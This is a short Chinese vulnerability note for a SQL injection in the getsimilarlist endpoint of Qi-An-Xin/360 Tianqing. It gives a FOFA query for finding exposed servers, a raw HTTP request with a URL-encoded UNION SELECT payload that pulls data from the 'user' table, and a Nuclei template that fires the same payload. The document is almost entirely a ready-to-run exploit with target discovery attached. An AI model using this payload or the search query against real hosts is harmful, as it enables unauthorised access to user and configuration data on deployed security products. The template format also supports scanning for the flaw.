奇安信360天擎getsimilarlistSQL注入漏洞

#FOFA搜索语法banner="QiAnXin web server" || banner="360 web server"  || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"

GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1Host: ipCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

id: qianxin-360-tianqing-getsimilarlist-sqli-rceinfo:  name: qianxin-360-tianqing-getsimilarlist-sqli-rce  author: xy  severity: high  tags: qianxin,sqli,iot  description: 奇安信360天擎getsimilarlist存在SQL注入漏洞  metadata:     fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"    verified: true    max-request: 1http:  - raw:      - |        GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1        Host:        User-Agent: Mozilla/5.0     matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:           - "list"          - "total"          - "reason":"success"        part: body         condition: and      - type: word        part: header        words:           - "application/json"